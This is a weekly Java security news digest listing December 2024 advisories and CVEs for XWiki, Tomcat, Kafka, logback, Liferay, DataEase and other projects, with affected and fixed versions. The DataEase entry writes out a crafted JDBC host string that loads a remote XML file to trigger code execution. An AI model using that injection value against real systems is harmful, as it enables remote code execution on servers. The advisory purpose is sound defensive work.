2024-49 Java Security Weekly News - Red Hat, Amazon, GitHub
Published on December 20, 2024
| Severity | Advisory |
|---|---|
| | Red Hat Security Advisory |
| | Amazon AWS Security Advisories |
| | GitHub Security Advisories |
| | GHSA-w9j7-phm3-f97j: Ucum-java has an XXE vulnerability in XML parsing. org.fhir:ucum, affected versions < 1.0.9, fixed in 1.0.9 |
| | GHSA-j2pq-22jj-4pm5: XWiki allows remote code execution through the extension sheet. org.xwiki.platform:xwiki-platform-repository-server-ui, affected versions >= 3.3-milestone-1, < 15.10.9, fixed in 15.10.9; affected versions >= 16.0.0-rc-1, < 16.3.0, fixed in 16.3.0 |
| | GHSA-wh34-m772-5398: XWiki Platform has an SQL injection in getdocuments.vm with the sort parameter. org.xwiki.platform:xwiki-platform-distribution-war, affected versions >= 11.10.6, < 13.10.5, fixed in 13.10.5; affected versions >= 14.0-rc-1, < 14.3-rc-1, fixed in 14.3-rc-1 |
| | GHSA-7mj5-hjjj-8rgw: http4k has a potential XXE (XML External Entity Injection) vulnerability. org.http4k:http4k-format-xml, affected versions >= 5.0.0.0, <= 5.40.0.0, fixed in 5.41.0.0; affected versions < 4.50.0.0, fixed in 4.50.0.0 |
| | GHSA-cwq6-mjmx-47p6: XWiki's scheduler in a subwiki allows scheduling operations for any main wiki user. org.xwiki.platform:xwiki-platform-scheduler-ui, affected versions >= 1.2-milestone-2, < 15.10.9, fixed in 15.10.9; affected versions >= 16.0.0-rc-1, < 16.3.0, fixed in 16.3.0 |
| | GHSA-2r87-74cx-2p7c: XWiki allows remote code execution from an account through macro descriptions and XWiki.XWikiSyntaxMacrosList. org.xwiki.platform:xwiki-platform-help-ui, affected versions >= 9.7-rc-1, < 15.10.11, fixed in 15.10.11; affected versions >= 16.0.0-rc-1, < 16.4.1, fixed in 16.4.1; affected versions >= 16.5.0-rc-1, < 16.5.0, fixed in 16.5.0 |
| | GHSA-r279-47wg-chpr: XWiki allows RCE from script right in configurable sections. org.xwiki.platform:xwiki-platform-administration-ui, affected versions >= 2.3, < 15.10.9, fixed in 15.10.9; affected versions >= 16.0.0-rc-1, < 16.3.0, fixed in 16.3.0 |
| | org.fhir:ucum |
| HIGH | CVE-2024-55887 Ucum-java is a FHIR Java library providing UCUM services. In versions prior to 1.0.9, XML parsing performed by the UcumEssenceService is vulnerable to XML external entity injection. A processed XML file with a malicious DTD tag could produce XML containing data from the host system. This impacts use cases where ucum is used within a host where external clients can submit XML. Release 1.0.9 of Ucum-java fixes this vulnerability. As a workaround, ensure that the source XML used to instantiate UcumEssenceService is trusted. Published Friday, December 13, 2024 |
| | Additional Java CVEs |
| N/A | CVE-2024-54677 Uncontrolled Resource Consumption vulnerability in the examples web application provided with Apache Tomcat leads to denial of service. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.9.97. Users are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue. Published Tuesday, December 17, 2024 |
| N/A | CVE-2024-50379 Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability during JSP compilation in Apache Tomcat permits an RCE on case insensitive file systems when the default servlet is enabled for write (non-default configuration). This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. Users are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue. Published Tuesday, December 17, 2024 |
| N/A | CVE-2024-12539 An issue was discovered where improper authorization controls affected certain queries that could allow a malicious actor to circumvent Document Level Security in Elasticsearch and get access to documents that their roles would normally not allow. Published Tuesday, December 17, 2024 |
| N/A | CVE-2024-56128 Incorrect implementation of the authentication algorithm in Apache Kafka's SCRAM implementation. Issue summary: Apache Kafka's implementation of the Salted Challenge Response Authentication Mechanism (SCRAM) did not fully adhere to the requirements of RFC 5802 [1]. Specifically, per RFC 5802, the server must verify that the nonce sent by the client in the second message matches the nonce sent by the server in its first message. Kafka's SCRAM implementation did not perform this validation. Impact: this vulnerability is exploitable only when an attacker has plaintext access to the SCRAM authentication exchange. Using SCRAM over plaintext is strongly discouraged as it is considered an insecure practice [2]. Apache Kafka recommends deploying SCRAM exclusively with TLS encryption to protect SCRAM exchanges from interception [3]. Deployments using SCRAM with TLS are not affected by this issue. How to detect if you are impacted: if your deployment uses SCRAM authentication over plaintext communication channels (without TLS encryption), you are likely impacted. To check whether TLS is enabled, review the listeners property in your server.properties configuration file; if it contains SASL_PLAINTEXT, you are likely impacted. Fix details: the issue has been addressed by introducing nonce verification in the final message of the SCRAM authentication exchange to ensure compliance with RFC 5802. Affected versions: Apache Kafka 0.10.2.0 through 3.9.0, excluding the fixed versions below. Fixed versions: 3.9.0, 3.8.1, 3.7.2. Users are advised to upgrade to 3.7.2 or later to mitigate this issue. Recommendations for mitigation: users unable to upgrade to the fixed versions can mitigate the issue by (1) using TLS with SCRAM authentication, always deploying SCRAM over TLS to encrypt authentication exchanges and protect against interception, and (2) considering alternative authentication mechanisms such as PLAIN, Kerberos or OAuth with TLS, which provide additional layers of security. Published Wednesday, December 18, 2024 |
| N/A | CVE-2024-55951 Metabase is an open-source data analytics platform. For new sandboxing configurations created in 1.52.0 through 1.52.2.4, sandboxed users are able to see field filter values from other sandboxed users. This is fixed in 1.52.2.5. Users on 1.52.0 or 1.52.1 or 1.5.2 should upgrade to 1.52.2.5. There are no workarounds for this issue aside from upgrading. Published Monday, December 16, 2024 |
| N/A | CVE-2024-11993 Reflected cross-site scripting (XSS) vulnerability in Liferay Portal 7.1.0 through 7.4.3.38, and Liferay DXP 7.4 GA through update 38, 7.3 GA through update 36, 7.2 GA through fix pack 20 and 7.1 GA through fix pack 28 allows remote attackers to execute arbitrary web script or HTML via the Dispatch name field. Published Tuesday, December 17, 2024 |
| N/A | CVE-2023-37940 Cross-site scripting (XSS) vulnerability in the edit Service Access Policy page in Liferay Portal 7.0.0 through 7.4.3.87, and Liferay DXP 7.4 GA through update 87, 7.3 GA through update 29, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into a service access policy's `Service Class` text field. Published Tuesday, December 17, 2024 |
| 5.7 | CVE-2024-10973 A vulnerability was found in Keycloak. The environment option `KC_CACHE_EMBEDDED_MTLS_ENABLED` does not work and the JGroups replication configuration is always used in plain text which can allow an attacker that has access to adjacent networks related to JGroups to read sensitive information. Published Tuesday, December 17, 2024 |
| N/A | CVE-2024-12798 Arbitrary code execution (ACE) vulnerability in JaninoEventEvaluator by QOS.CH logback-core up to and including version 1.5.12 in Java applications allows an attacker to execute arbitrary code by compromising an existing logback configuration file or by injecting an environment variable before program execution. Malicious logback configuration files can allow the attacker to execute arbitrary code using the JaninoEventEvaluator extension. A successful attack requires the user to have write access to a configuration file. Alternatively, the attacker could inject a malicious environment variable pointing to a malicious configuration file. In both cases, the attack requires existing privilege. Published Thursday, December 19, 2024 |
| N/A | CVE-2024-35230 GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. In affected versions the welcome and about page includes version and revision information about the software in use (including library and components used). This information is sensitive from a security point of view because it allows software used by the server to be easily identified. This issue has been patched in version 2.26.0 and all users are advised to upgrade. There are no known workarounds for this vulnerability. Published Monday, December 16, 2024 |
| N/A | CVE-2024-49194 Databricks JDBC Driver before 2.6.40 could potentially allow remote code execution (RCE) by triggering a JNDI injection via a JDBC URL parameter. The vulnerability is rooted in the improper handling of the krbJAASFile parameter. An attacker could potentially exploit this vulnerability to achieve Remote Code Execution in the context of the driver by tricking a victim into using a crafted connection URL that uses the property krbJAASFile. Published Tuesday, December 17, 2024 |
| N/A | CVE-2024-55557 ui/pref/ProxyPrefView.java in weasis-core in Weasis 4.5.1 has a hardcoded key for symmetric encryption of proxy credentials. Published Monday, December 16, 2024 |
| N/A | CVE-2024-55451 A Stored Cross-Site Scripting (XSS) vulnerability exists in authenticated SVG file upload and viewing functionality in UJCMS 9.6.3. The vulnerability arises from insufficient sanitization of embedded attributes in uploaded SVG files. When a maliciously crafted SVG file is viewed by other backend users, it allows authenticated attackers to execute arbitrary JavaScript in the context of other backend users' browsers, potentially leading to the theft of sensitive tokens. Published Monday, December 16, 2024 |
| N/A | CVE-2024-55452 A URL redirection vulnerability exists in UJCMS 9.6.3 due to improper validation of URLs in the upload and rendering of new block / carousel items. This vulnerability allows authenticated attackers to redirect unprivileged users to an arbitrary, attacker-controlled webpage. When an authenticated user clicks on the malicious block item, they are redirected to the arbitrary untrusted domains, where sensitive tokens, such as JSON Web Tokens, can be stolen via a crafted webpage. Published Monday, December 16, 2024 |
| N/A | CVE-2024-55952 DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the JDBC connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext constructor. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability. Published Wednesday, December 18, 2024 |
| N/A | CVE-2024-12801 Server-Side Request Forgery (SSRF) in SaxEventRecorder by QOS.CH logback version 1.5.12 on the Java platform allows an attacker to forge requests by compromising logback configuration files in XML. The attack involves the modification of the DOCTYPE declaration in XML configuration files. Published Thursday, December 19, 2024 |
| N/A | CVE-2024-12700 There is an unrestricted file upload vulnerability where it is possible for an authenticated user (low privileged) to upload a JSP shell and execute code with the privileges of the user running the web server. Published Thursday, December 19, 2024 |
